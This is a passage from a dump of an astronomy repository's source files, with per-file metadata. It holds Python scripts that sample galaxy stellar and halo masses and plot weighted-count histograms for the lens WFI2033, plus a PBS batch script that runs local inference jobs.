Otherwise either there will be too much blank space or the color map will overlap the images. An alternative is to use ImageGrid, but that only works for images with exactly the same pixel size, which is not the case here.\nfig, axes = plt.subplots(nrows=2, ncols=5, gridspec_kw={\"width_ratios\":[1,1,1,1,0.05]},figsize=(4,2)) # setting the colorbar column to be narrow; each of the 2x5 subplots gets an axis\n# Unfortunately I couldn't find a way to make the margins of the plots touch perfectly. That is an interplay between figsize and subplots_adjust parameters\n\ndef imageplt(image,noise,center,side,cat,band,ax):\n #print np.std(image)\n image = image / noise # rescale pixel values so that the standard deviation is 1; this is in order to share one colorbar across images with different noise properties, and also so that I can have the colorbar in units of sigma\n image = convolve(image, kernel)\n global im\n im = ax.imshow(image[center[1]-int(side/2):center[1]+int(side/2),center[0]-int(side/2):center[0]+int(side/2)], cmap='gray', origin='lower', aspect='equal', vmin=-lim, vmax=lim)\n ax.text(side * 4.5/6, side * 5.0/6, band, size='10')\n ax.scatter(cat[0]-center[0]+int(side/2),cat[1]-center[1]+int(side/2),marker='*',s=5,facecolors='none', edgecolors='k')\n ax.set_xticks([])\n ax.set_yticks([])\n\ni = 0\nfor ax in axes.flat:\n if i == 0: imageplt(image_g,noise_g,center_g,side_g,cat_g,'g',ax)\n if i == 1: imageplt(image_r,noise_r,center_r,side_r,cat_r,'r',ax)\n if i == 2: imageplt(image_i,noise_i,center_i,side_i,cat_i,'i',ax)\n if i == 3: imageplt(image_z,noise_z,center_z,side_z,cat_z,'z',ax)\n if i == 4: ax.axis('off')\n if i == 5: imageplt(image_y,noise_y,center_y,side_y,cat_y,'y',ax)\n if i == 6: imageplt(image_Y,noise_Y,center_Y,side_Y,cat_Y,'Y',ax)\n if i == 7: imageplt(image_J,noise_J,center_J,side_J,cat_J,'J',ax)\n if i == 8: imageplt(image_K,noise_K,center_K,side_K,cat_K,'Ks',ax)\n i += 1\n\nip = InsetPosition(axes.flat[8], [1.05,0,0.05,2]) # allows me to set the position of the colorbar wherever I want, in this case right after the final subplot, extended across two rows\naxes.flat[9].set_axes_locator(ip)\n\ncbar=fig.colorbar(im, cax=axes.flat[9], ax=[axes.flat[0],axes.flat[1],axes.flat[2],axes.flat[3],axes.flat[5],axes.flat[6],axes.flat[7],axes.flat[8]],ticks=np.linspace(-lim,lim,2*lim+1))\ncbar.ax.tick_params(labelsize=6)\n#cbar.ax.set_yticklabels([str(x) for x in np.linspace(-lim,lim,2*lim+1)])\n\nplt.subplots_adjust(bottom=0, left=0, right=1, top=1, wspace=0, hspace=-0.02)\nplt.savefig('hostlens.eps', dpi=150, bbox_inches='tight')\n" }, { "alpha_fraction": 0.47946280241012573, "alphanum_fraction": 0.5683656930923462, "avg_line_length": 56.61538314819336, "blob_id": "d13c63e007d66ce551a8876badf89d3c9803d1f7", "content_id": "f7ff484b30064dff99a04cf104fa39982b8b54d2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12733, "license_type": "no_license", "max_line_length": 418, "num_lines": 221, "path": "/python/catalogue_utilities/mstarsampling_nobeta.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# run this in order to sample from P(Mstar,z) for the lens catalogue. 
It requires that the output files produced by photozsampling.py first be used as input for LePhare, and then combined with combinelephare_withredshift.py\n\nimport numpy as np\nimport scipy\nfrom scipy import stats\nimport sys\nimport os\nfrom os import system\n\n# Behroozi et al 2010 parameters for z < 1:\nM10_ = np.array([12.35,-0.16,+0.07])\nM1a_ = np.array([0.28,-0.97,+0.19])\nMs00_ = np.array([10.72,-0.29,+0.22])\nMs0a_ = np.array([0.55,-0.79,+0.18])\nb0_ = np.array([0.44,-0.06,+0.04])\nba_ = np.array([0.18,-0.34,+0.08])\nd0_ = np.array([0.57,-0.06,+0.15])\nda_ = np.array([0.17,-0.41,+0.42])\ng0_ = np.array([1.56,-0.38,+0.12])\nga_ = np.array([2.51,-1.83,+0.15])\n# z >= 1:\nM10 = np.array([12.27,-0.27,+0.59])\nM1a = np.array([-0.84,-0.58,+0.87])\nMs00 = np.array([11.09,-0.31,+0.54])\nMs0a = np.array([0.56,-0.44,+0.89])\nb0 = np.array([0.65,-0.20,+0.26])\nba = np.array([0.31,-0.47,+0.38])\nd0 = np.array([0.56,-0.29,+1.33])\nda = np.array([-0.12,-0.50,+0.76])\ng0 = np.array([1.12,-0.36,+7.47])\nga = np.array([-0.53,-2.50,+7.87])\n\ndef sample(median,stdlow,stdhigh): # samples from different standard deviation gaussians on each side of the mean\n rand = np.random.uniform(0,1,1)[0]\n if rand <= 0.5: # since MED divides the distribution in two equal parts\n return median - np.abs(np.random.normal(0, np.abs(stdlow), 1)[0])\n else:\n return median + np.abs(np.random.normal(0, stdhigh, 1)[0])\n\nsamples = 20\nmasterfile = \"/Users/cerusu/Dropbox/Davis_work/code/WFI2033/i_detect_i_and_ir_rnoconv_inoconv_ugrizYJHK_detectin_ir_short_potentiallyi23_withbpzeazylephareclassified_IRACmagslephareclassifiedF160W.cat\"\n#massfile = \"/Users/cerusu/Dropbox/Davis_work/code/WFI2033/i_detect_i_and_ir_rnoconv_inoconv_ugrizYJHK_detectin_ir_short_potentiallyi23_withbpzeazylephareclassified_IRACmagslephareclassifiedF160W_bpzsample_combined.cat.MAG_BC03_I09.lephareout\"\nmassfile = \"/Users/cerusu/Dropbox/Davis_work/code/WFI2033/i_detect_i_and_ir_rnoconv_inoconv_ugrizYJHK_detectin_ir_short_potentiallyi23_withbpzeazylephareclassified_IRACmagslephareclassifiedF160W_eazysample_combined.cat.MAG_BC03_I09.lephareout\"\n#massfile = \"/Users/cerusu/Dropbox/Davis_work/code/WFI2033/i_detect_i_and_ir_rnoconv_inoconv_ugrizYJHK_detectin_ir_short_potentiallyi23_withbpzeazylephareclassified_IRACmagslephareclassifiedF160W_noIRACbpzsample_combined.cat.MAG_BC03_I09.lephareout\"\n#massfile = \"/Users/cerusu/Dropbox/Davis_work/code/WFI2033/i_detect_i_and_ir_rnoconv_inoconv_ugrizYJHK_detectin_ir_short_potentiallyi23_withbpzeazylephareclassified_IRACmagslephareclassifiedF160W_noIRACeazysample_combined.cat.MAG_BC03_I09.lephareout\"\n#masterfile = \"/Users/cerusu/Dropbox/Davis_work/code/WFI2033/rnoconv_inoconv_ugrizYJHK_detectin_ir_short_potentiallyi23_withbpzeazylephareclassified_IRACmagslephareclassifiedF160W.cat\"\n#massfile = \"/Users/cerusu/Dropbox/Davis_work/code/WFI2033/rnoconv_inoconv_ugrizYJHK_detectin_ir_short_potentiallyi23_withbpzeazylephareclassified_IRACmagslephareclassifiedF160W_bpzsample_combined.cat.MAG_BC03_I09.lephareout\"\n#massfile = \"/Users/cerusu/Dropbox/Davis_work/code/WFI2033/rnoconv_inoconv_ugrizYJHK_detectin_ir_short_potentiallyi23_withbpzeazylephareclassified_IRACmagslephareclassifiedF160W_eazysample_combined.cat.MAG_BC03_I09.lephareout\"\n#massfile = \"/Users/cerusu/Dropbox/Davis_work/code/WFI2033/rnoconv_inoconv_ugrizYJHK_detectin_ir_short_potentiallyi23_withbpzeazylephareclassified_IRACmagslephareclassifiedF160W_noIRACbpzsample_combined.cat.MAG_BC03_I09.lephareout\"\n#massfile = 
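# --- Aside (hedged Monte Carlo check of sample() above, with made-up numbers): the code further below calls sample(mMED, mINF-mMED, mSUP-mMED) with a negative lower width (the function takes its absolute value), so many draws should reproduce asymmetric 16/50/84 percentiles, e.g.:\n#   draws = np.array([sample(10.0, -0.3, 0.2) for k in range(100000)])\n#   print np.percentile(draws, [16, 50, 84])   # expect roughly [9.7, 10.0, 10.2]\n# --- end aside; the commented path below continues the original code.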
\"/Users/cerusu/Dropbox/Davis_work/code/WFI2033/rnoconv_inoconv_ugrizYJHK_detectin_ir_short_potentiallyi23_withbpzeazylephareclassified_IRACmagslephareclassifiedF160W_noIRACeazysample_combined.cat.MAG_BC03_I09.lephareout\"\n\n\nx = 0\ny = 1\nra = 2\ndec = 3\ni_auto = 4\ni_auto_err = 5\nid = 8\nz_b = 28\nz_m2 = 48\nspec = 40\n#mBEST_ind_bpz = 60 # no IRAC\n#mINF_ind_bpz = 61 # no IRAC\n#mMED_ind_bpz = 62 # no IRAC\n#mSUP_ind_bpz = 63 # no IRAC\n#mBEST_ind_eazy = 67 # no IRAC\n#mINF_ind_eazy = 68 # no IRAC\n#mMED_ind_eazy = 69 # no IRAC\n#mSUP_ind_eazy = 70 # no IRAC\n#class_bpz = 72 # no IRAC\n#class_eazy = 73 # no IRAC\nmBEST_ind_bpz = 85\nmINF_ind_bpz = 86\nmMED_ind_bpz = 87\nmSUP_ind_bpz = 88\nmBEST_ind_eazy = 92\nmINF_ind_eazy = 93\nmMED_ind_eazy = 94\nmSUP_ind_eazy = 95\nclass_bpz = 97\nclass_eazy = 98\nif \"bpzsample\" in massfile: classify = class_bpz\nelse: classify = class_eazy\n\nmaster = np.loadtxt(masterfile,usecols=[x,y,ra,dec,i_auto,i_auto_err,id,classify,spec,z_b,z_m2,mBEST_ind_bpz,mINF_ind_bpz,mMED_ind_bpz,mSUP_ind_bpz,mBEST_ind_eazy,mINF_ind_eazy,mMED_ind_eazy,mSUP_ind_eazy],unpack=False)\nmass = np.loadtxt(massfile,usecols=[0,1,4,5,6,7]) # index, redshift and masses\n\n# Re-label columns\nx = 0\ny = 1\nra = 2\ndec = 3\ni_auto = 4\ni_auto_err = 5\nid = 6\nclassify = 7\nspec = 8\nz_b = 9\nz_m2 = 10\nmBEST_ind_bpz = 11\nmINF_ind_bpz = 12\nmMED_ind_bpz = 13\nmSUP_ind_bpz = 14\nmBEST_ind_eazy = 15\nmINF_ind_eazy = 16\nmMED_ind_eazy = 17\nmSUP_ind_eazy = 18\n\nif \"bpzsample\" in massfile:\n z_ind = z_b\n mBEST_ind = mBEST_ind_bpz\n mINF_ind = mINF_ind_bpz\n mMED_ind = mMED_ind_bpz\n mSUP_ind = mSUP_ind_bpz\nelse:\n z_ind = z_m2\n mBEST_ind = mBEST_ind_eazy\n mINF_ind = mINF_ind_eazy\n mMED_ind = mMED_ind_eazy\n mSUP_ind = mSUP_ind_eazy\n\n# for missing mMED take its error bars to be typical for that mag range\nerrbar18 = np.median(master[:,mMED_ind][(master[:,i_auto]>15) & (master[:,i_auto]<18) & (master[:,mMED_ind]!=-99)] - master[:,mINF_ind][(master[:,i_auto]>15) & (master[:,i_auto]<18) & (master[:,mMED_ind]!=-99)])\nerrbar19 = np.median(master[:,mMED_ind][(master[:,i_auto]>18) & (master[:,i_auto]<19) & (master[:,mMED_ind]!=-99)] - master[:,mINF_ind][(master[:,i_auto]>18) & (master[:,i_auto]<19) & (master[:,mMED_ind]!=-99)])\nerrbar20 = np.median(master[:,mMED_ind][(master[:,i_auto]>19) & (master[:,i_auto]<20) & (master[:,mMED_ind]!=-99)] - master[:,mINF_ind][(master[:,i_auto]>19) & (master[:,i_auto]<20) & (master[:,mMED_ind]!=-99)])\nerrbar21 = np.median(master[:,mMED_ind][(master[:,i_auto]>20) & (master[:,i_auto]<21) & (master[:,mMED_ind]!=-99)] - master[:,mINF_ind][(master[:,i_auto]>20) & (master[:,i_auto]<21) & (master[:,mMED_ind]!=-99)])\nerrbar22 = np.median(master[:,mMED_ind][(master[:,i_auto]>21) & (master[:,i_auto]<22) & (master[:,mMED_ind]!=-99)] - master[:,mINF_ind][(master[:,i_auto]>21) & (master[:,i_auto]<22) & (master[:,mMED_ind]!=-99)])\nerrbar23 = np.median(master[:,mMED_ind][(master[:,i_auto]>21) & (master[:,mMED_ind]!=-99)] - master[:,mINF_ind][(master[:,i_auto]>21) & (master[:,mMED_ind]!=-99)])\n\nfor i in range(master.shape[0]):\n line = np.zeros(8 + (samples + 1) * 3) # x,y,ra,dec,i_auto,i_auto_err,id,classify + 10 * (z,Mstar,Mhalo)\n line[0:8] = master[i][0:8] # x,y,ra,dec,i_auto,i_auto_err,id,classify are the first 8 columns from master\n z = np.zeros(samples + 1)\n if master[i][spec] > 0: z[0] = master[i][spec] # if there is a galaxy spectrum\n else: z[0] = master[i][z_ind]\n\n mBEST = master[i][mBEST_ind]\n mINF = master[i][mINF_ind]\n mMED = 
master[i][mMED_ind]\n    mSUP = master[i][mSUP_ind]\n    if mBEST < 0:\n        mBEST = 9\n    if mMED < 0:\n        mMED = mBEST\n        if (master[i][i_auto] > 15) & (master[i][i_auto] <= 18): errbar = errbar18\n        if (master[i][i_auto] > 18) & (master[i][i_auto] <= 19): errbar = errbar19\n        if (master[i][i_auto] > 19) & (master[i][i_auto] <= 20): errbar = errbar20\n        if (master[i][i_auto] > 20) & (master[i][i_auto] <= 21): errbar = errbar21\n        if (master[i][i_auto] > 21) & (master[i][i_auto] <= 22): errbar = errbar22\n        if master[i][i_auto] > 22: errbar = errbar23\n        mINF = mBEST - errbar\n        mSUP = mBEST + errbar\n    m = np.zeros(samples + 1)\n    mhalo = np.zeros(samples + 1)\n    m[0] = mMED\n    a = 1 / (1 + z[0])\n    if z[0] <= 1:\n        logM1a = M10_[0] + M1a_[0] * (a - 1)\n        logMs0a = Ms00_[0] + Ms0a_[0] * (a - 1)\n        notlogMs0a = 10 ** logMs0a\n        b = b0_[0] + ba_[0] * (a-1)\n        d = d0_[0] + da_[0] * (a-1)\n        g = g0_[0] + ga_[0] * (a-1)\n        mhalo[0] = logM1a + b * (m[0] - logMs0a) + ((10 ** m[0]/notlogMs0a)**d)/(1+(10 ** m[0]/notlogMs0a)**(-g)) - 0.5\n    else:\n        logM1a = M10[0] + M1a[0] * (a - 1)\n        logMs0a = Ms00[0] + Ms0a[0] * (a - 1)\n        notlogMs0a = 10 ** logMs0a\n        b = b0[0] + ba[0] * (a-1)\n        d = d0[0] + da[0] * (a-1)\n        g = g0[0] + ga[0] * (a-1)\n        mhalo[0] = logM1a + b * (m[0] - logMs0a) + ((10 ** m[0]/notlogMs0a)**d)/(1+(10 ** m[0]/notlogMs0a)**(-g)) - 0.5\n    line[8:11] = np.array([z[0],m[0],mhalo[0]])\n\n    ind = 0\n    for j in range(mass.shape[0]):\n        if mass[j][0] == master[i][id]:\n            ind = ind + 1 # this goes from 1 to samples\n            z[ind] = mass[j][1]\n            a = 1 / (1 + z[ind]) # scale factor at the sampled redshift\n\n            rand = np.random.uniform(0,1,1)[0]\n            mBEST = mass[j][2]\n            mINF = mass[j][3]\n            mMED = mass[j][4]\n            mSUP = mass[j][5]\n            if mBEST < 0:\n                mBEST = 9\n            if mMED < 0:\n                mMED = mBEST\n                mINF = mBEST - errbar\n                mSUP = mBEST + errbar\n            m[ind] = sample(mMED,mINF-mMED,mSUP - mMED)\n            if z[ind] <= 1:\n                logM1a = sample(M10_[0],M10_[1],M10_[2]) + sample(M1a_[0],M1a_[1],M1a_[2]) * (a - 1)\n                logMs0a = sample(Ms00_[0],Ms00_[1],Ms00_[2]) + sample(Ms0a_[0],Ms0a_[1],Ms0a_[2]) * (a - 1)\n                notlogMs0a = 10 ** logMs0a\n                b = sample(b0_[0],b0_[1],b0_[2]) + sample(ba_[0],ba_[1],ba_[2]) * (a - 1)\n                d = sample(d0_[0],d0_[1],d0_[2]) + sample(da_[0],da_[1],da_[2]) * (a - 1)\n                g = sample(g0_[0],g0_[1],g0_[2]) + sample(ga_[0],ga_[1],ga_[2]) * (a - 1)\n            else:\n                logM1a = sample(M10[0],M10[1],M10[2]) + sample(M1a[0],M1a[1],M1a[2]) * (a - 1)\n                logMs0a = sample(Ms00[0],Ms00[1],Ms00[2]) + sample(Ms0a[0],Ms0a[1],Ms0a[2]) * (a - 1)\n                notlogMs0a = 10 ** logMs0a\n                b = sample(b0[0],b0[1],b0[2]) + sample(ba[0],ba[1],ba[2]) * (a - 1)\n                d = sample(d0[0],d0[1],d0[2]) + sample(da[0],da[1],da[2]) * (a - 1)\n                g = sample(g0[0],g0[1],g0[2]) + sample(ga[0],ga[1],ga[2]) * (a - 1)\n            mhalo[ind] = logM1a + b * (m[ind] - logMs0a) + ((10 ** m[ind]/notlogMs0a)**d)/(1+(10 ** m[ind]/notlogMs0a)**(-g)) - 0.5\n\n    for j in range(samples):\n        line[8+(j+1)*3:8+(j+2)*3] = np.array([z[j+1],m[j+1],mhalo[j+1]])\n    if i == 0:\n        data = line\n        data[0:8] = master[0][0:8]\n    else:\n        data = np.c_[data,line]\n\n#np.savetxt(masterfile[:-4] + \"_WFI2033noIRACbpz_nobeta.cat\",data.T,fmt='%s %s %s %s %.2f %.2f %d %d %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f')\n#np.savetxt(masterfile[:-4] + \"_WFI2033noIRACeazy_nobeta.cat\",data.T,fmt='%s %s %s %s %.2f %.2f %d %d %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f 
%.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f')\n#np.savetxt(masterfile[:-4] + \"_WFI2033IRACbpz_nobeta.cat\",data.T,fmt='%s %s %s %s %.2f %.2f %d %d %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f')\nnp.savetxt(masterfile[:-4] + \"_WFI2033IRACeazy_nobeta.cat\",data.T,fmt='%s %s %s %s %.2f %.2f %d %d %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f %.2f %.4f %.4f')\n" }, { "alpha_fraction": 0.6681715846061707, "alphanum_fraction": 0.7629796862602234, "avg_line_length": 23.61111068725586, "blob_id": "c54a382b91320ce302f305263f3219d83b63c0fd", "content_id": "515f107251a029b2ef011f4f362f4f45bd6b934d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Shell", "length_bytes": 443, "license_type": "no_license", "max_line_length": 100, "num_lines": 18, "path": "/python/scripts/NAOJ/batch_infer16.sh", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "#!/bin/sh\n#PBS -r y\n#PBS -m abe\n#PBS -q q1m\n#PBS -o Log16.out\n#PBS -e Log16.err\n#PBS -N 16\n#PBS -l mem=16gb\n#PBS -M [email protected]\n\n# Go to this job's working directory\ncd $PBS_O_HOME\n\n# Run your executable\ncd /mfst01a/rusucs/WFI2033/MSwghtratios/\n\npython inferkappa_unbiasedwithshearincrement2226.py WFI2033 5 45 23 meds gal gamma oneoverr flexion\npython inferkappa_unbiasedwithshearincrement2224.py WFI2033 5 120 23 meds gal gamma oneoverr flexion\n" }, { "alpha_fraction": 0.5681338310241699, "alphanum_fraction": 0.6441061496734619, "avg_line_length": 55.45957565307617, "blob_id": "f5169838a161e1ce3d542790d2c182d19e2b5fc2", "content_id": "4044998e2f7da41349d6a1cdbac73e6b7da223ff", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 13268, "license_type": "no_license", "max_line_length": 312, "num_lines": 235, "path": "/python/catalogue_utilities/weightinguniversal_histograms_samples_publicationqualitynotext.py", "repo_name": "eduardrusu/zMstarPDF", "src_encoding": "UTF-8", "text": "# The code uses the weighted count ratios derived by weightinguniversal_overlap_sampling_nobeta_WFI2033rethought.py to produce paper-quality histograms without overlapped text\n# run as # run as python /Users/cerusu/GITHUB/zMstarPDF/python/catalogue_utilities/weightinguniversal_histograms_publicationqualitynotext.py WFI2033 45 5 23 meds bpz deti IRAC 0.61 0.71 100 handpicked\n# currently the code considers a fraction of 50% for the fields without mask\n\nimport numpy as np\nimport sys\nimport os\nimport time\nimport matplotlib.pyplot as plt\n\nplt.clf()\n\nlens = str(sys.argv[1])\nradius = str(sys.argv[2])\ninner = str(sys.argv[3])\nmag = str(sys.argv[4])\nmode = str(sys.argv[5])\nphotz = str(sys.argv[6])\ndetect = str(sys.argv[7])\nirac = str(sys.argv[8])\nzinf = str(sys.argv[9])\nzsup = str(sys.argv[10])\nbin = 
int(str(sys.argv[11]))\ntry: handpicked = '_'+str(sys.argv[12])\nexcept: handpicked = ''\n\nfontabsciss = 14\nfontlabel = 4\npltrange = 2.5\nif radius == \"45\":\n vertlimit = 2.5\nelse:\n vertlimit = 2.5\nif mode == \"sum\":\n vertlimit = 2.5\nlimit = 10**30\nroot = \"/Volumes/LaCieSubaru/weightedcounts/%s/\" % lens\n\nstart_time = time.time()\n\nprint \"Reading...\"\n''' if I want to plot the benchmark'''\n#lstW1_50 = [x for x in os.listdir(root) if ('W1' in x) and ('_24galphotmstar_50_%s_%s_%s_%s_%s_%sarcsec_0.lst' %(radius,lens,detect,irac,mode,inner) in x)] # select from the files in the root directory\n#lstW2_50 = [x for x in os.listdir(root) if ('W2' in x) and ('_24galphotmstar_50_%s_%s_%s_%s_%s_%sarcsec_0.lst' %(radius,lens,detect,irac,mode,inner) in x)]\n#lstW3_50 = [x for x in os.listdir(root) if ('W3' in x) and ('_24galphotmstar_50_%s_%s_%s_%s_%s_%sarcsec_0.lst' %(radius,lens,detect,irac,mode,inner) in x)]\n#lstW4_50 = [x for x in os.listdir(root) if ('W4' in x) and ('_24galphotmstar_50_%s_%s_%s_%s_%s_%sarcsec_0.lst' %(radius,lens,detect,irac,mode,inner) in x)]\n''' if I want to plot everything together'''\nlstW1_50 = [x for x in os.listdir(root) if ('W1' in x) and ('_24galphotmstar_50_msk%sarcsecrad%sarcsecgap_%s_%s_%s_%s_zgap%s_%s%s' %(radius,inner,lens,detect,irac,mode,zinf,zsup,handpicked) in x)] # select from the files in the root directory\nlstW2_50 = [x for x in os.listdir(root) if ('W2' in x) and ('_24galphotmstar_50_msk%sarcsecrad%sarcsecgap_%s_%s_%s_%s_zgap%s_%s%s' %(radius,inner,lens,detect,irac,mode,zinf,zsup,handpicked) in x)]\nlstW3_50 = [x for x in os.listdir(root) if ('W3' in x) and ('_24galphotmstar_50_msk%sarcsecrad%sarcsecgap_%s_%s_%s_%s_zgap%s_%s%s' %(radius,inner,lens,detect,irac,mode,zinf,zsup,handpicked) in x)]\nlstW4_50 = [x for x in os.listdir(root) if ('W4' in x) and ('_24galphotmstar_50_msk%sarcsecrad%sarcsecgap_%s_%s_%s_%s_zgap%s_%s%s' %(radius,inner,lens,detect,irac,mode,zinf,zsup,handpicked) in x)]\n\nif mag == \"24\" and photz == \"bpz\": cols=[4,6,8,10,12,14,16,18,20,22,24,26,28,30,32,34,36,38]\nif mag == \"24\" and photz == \"eazy\": cols=[40,42,44,46,48,50,52,54,56,58,60,62,64,66,68,70,72,74]\nif mag == \"23\" and photz == \"bpz\": cols=[5,7,9,11,13,15,17,19,21,23,25,27,29,31,33,35,37,39]\nif mag == \"23\" and photz == \"eazy\": cols=[41,43,45,47,49,51,53,55,57,59,61,63,65,67,69,71,73,75]\n\nfor i in range(len(lstW1_50)):\n if i == 0:\n q_W1_50read = np.loadtxt(root+lstW1_50[i], usecols=cols, unpack=True)\n else:\n q_W1_50read = np.r_['1',q_W1_50read,np.loadtxt(root+ lstW1_50[i], usecols=cols, unpack=True)]\n\nfor i in range(len(lstW2_50)):\n if i == 0:\n q_W2_50read = np.loadtxt(root+lstW2_50[i], usecols=cols, unpack=True)\n else:\n q_W2_50read = np.r_['1',q_W2_50read,np.loadtxt(root+ lstW2_50[i], usecols=cols, unpack=True)]\n\nfor i in range(len(lstW3_50)):\n if i == 0:\n q_W3_50read = np.loadtxt(root+lstW3_50[i], usecols=cols, unpack=True)\n else:\n q_W3_50read = np.r_['1',q_W3_50read,np.loadtxt(root+ lstW3_50[i], usecols=cols, unpack=True)]\n\nfor i in range(len(lstW4_50)):\n if i == 0:\n q_W4_50read = np.loadtxt(root+lstW4_50[i], usecols=cols, unpack=True)\n else:\n q_W4_50read = np.r_['1',q_W4_50read,np.loadtxt(root+ lstW4_50[i], usecols=cols, unpack=True)]\n\nprint \"Plotting...\"\n\nfig = plt.figure(figsize=(10,6))\nax1 = fig.add_subplot(6,3,1)\nax1.set_aspect(1, adjustable='datalim')\n\nfor i in range(18):\n \n q_W1_50 = q_W1_50read[i][q_W1_50read[i] < limit]\n if mode == \"sum\": q_W1_50 = abs(q_W1_50) # fix the negative halo 
convergence\n    q_W2_50 = q_W2_50read[i][q_W2_50read[i] < limit]\n    if mode == \"sum\": q_W2_50 = abs(q_W2_50)\n    q_W3_50 = q_W3_50read[i][q_W3_50read[i] < limit]\n    if mode == \"sum\": q_W3_50 = abs(q_W3_50)\n    q_W4_50 = q_W4_50read[i][q_W4_50read[i] < limit]\n    if mode == \"sum\": q_W4_50 = abs(q_W4_50)\n    \n    ax = plt.subplot(6,3,i+1, sharex=ax1, sharey=ax1) # the 18 weights map one-to-one onto the 6x3 grid\n    \n    plt.hist(q_W1_50, histtype='step', color='b', label='W1_50', linewidth=0.5, normed=1, bins=bin, range=[0, pltrange])\n    plt.hist(q_W2_50, histtype='step', color='g', label='W2_50', linewidth=0.5, normed=1, bins=bin, range=[0, pltrange])\n    plt.hist(q_W3_50, histtype='step', color='r', label='W3_50', linewidth=0.5, normed=1, bins=bin, range=[0, pltrange])\n    plt.hist(q_W4_50, histtype='step', color='k', label='W4_50', linewidth=0.5, normed=1, bins=bin, range=[0, pltrange])\n\n    z=np.linspace(0,vertlimit,1000)\n    w=np.ones(1000)\n    plt.plot(w,z,'k:')\n    w=np.ones(1000) * np.median(q_W1_50)\n    plt.plot(w,z,'b--')\n    w=np.ones(1000) * np.median(q_W2_50)\n    plt.plot(w,z,'g--')\n    w=np.ones(1000) * np.median(q_W3_50)\n    plt.plot(w,z,'r--')\n    w=np.ones(1000) * np.median(q_W4_50)\n    plt.plot(w,z,'k--')\n    plt.xlim(0, 2.5)\n    plt.ylim(0, vertlimit)\n    ax.set_yticklabels(np.arange(0.0, vertlimit, 0.5)) # same 0.5-spaced tick labels for any vertlimit\n    ax.set_xticklabels(np.arange(0.0, 2.5, 0.5))\n    if i == 0: ax.text(0.7, 0.7, '$1$', fontsize=fontabsciss, color='black',transform=ax.transAxes)\n    if i == 1: ax.text(0.7, 0.7, '$z$', fontsize=fontabsciss, color='black',transform=ax.transAxes)\n    if i == 2: ax.text(0.7, 0.7, '$M_\star$', fontsize=fontabsciss, color='black',transform=ax.transAxes)\n    if i == 3: ax.text(0.7, 0.7, '$M^2_\star$', fontsize=fontabsciss, color='black',transform=ax.transAxes)\n    if i == 4: ax.text(0.7, 0.7, '$M^3_\star$', fontsize=fontabsciss, color='black',transform=ax.transAxes)\n    if i == 5: ax.text(0.7, 0.7, '$1/r$', fontsize=fontabsciss, color='black',transform=ax.transAxes)\n    if i == 6: ax.text(0.7, 0.7, '$z/r$', fontsize=fontabsciss, color='black',transform=ax.transAxes)\n    if i == 7: ax.text(0.7, 0.7, '$M_\star/r$', fontsize=fontabsciss, color='black',transform=ax.transAxes)\n    if i == 8: ax.text(0.7, 0.7, '$M^2_\star/r$', fontsize=fontabsciss, color='black',transform=ax.transAxes)\n    if i == 9: ax.text(0.7, 0.7, '$M^3_\star/r$', fontsize=fontabsciss, color='black',transform=ax.transAxes)\n    if i == 10: ax.text(0.7, 0.7, '$M^2_{\star\mathrm{,rms}}$', fontsize=fontabsciss, 
color='black',transform=ax.transAxes)\n    if i == 11: ax.text(0.7, 0.7, '$M^3_{\star\mathrm{,rms}}$', fontsize=fontabsciss, color='black',transform=ax.transAxes)\n    if i == 12: ax.text(0.7, 0.7, '$M^2_\star/r_\mathrm{,rms}$', fontsize=fontabsciss, color='black',transform=ax.transAxes)\n    if i == 13: ax.text(0.7, 0.7, '$M^3_\star/r_\mathrm{,rms}$', fontsize=fontabsciss, color='black',transform=ax.transAxes)\n    if i == 14: ax.text(0.7, 0.7, '$M_\star/r^3$', fontsize=fontabsciss, color='black',transform=ax.transAxes)\n    if i == 15: ax.text(0.7, 0.7, '$M_\star/r^2$', fontsize=fontabsciss, color='black',transform=ax.transAxes)\n    if i == 16: ax.text(0.7, 0.7, '$\sqrt{M_\star}/r$', fontsize=fontabsciss, color='black',transform=ax.transAxes)\n    if i == 17: ax.text(0.7, 0.7, '$\sqrt{M_h}/r$', fontsize=fontabsciss, color='black',transform=ax.transAxes)\n    #ax.set_xticklabels(np.arange(0.0, 3.0, 0.5))\n    #if i in [0,4,8,12,15]:\n    #plt.ylabel(\"Normalized counts\", fontsize=5)\n\n    plt.tick_params(axis='x', labelsize=10)\n    plt.tick_params(axis='y', labelsize=10)\n    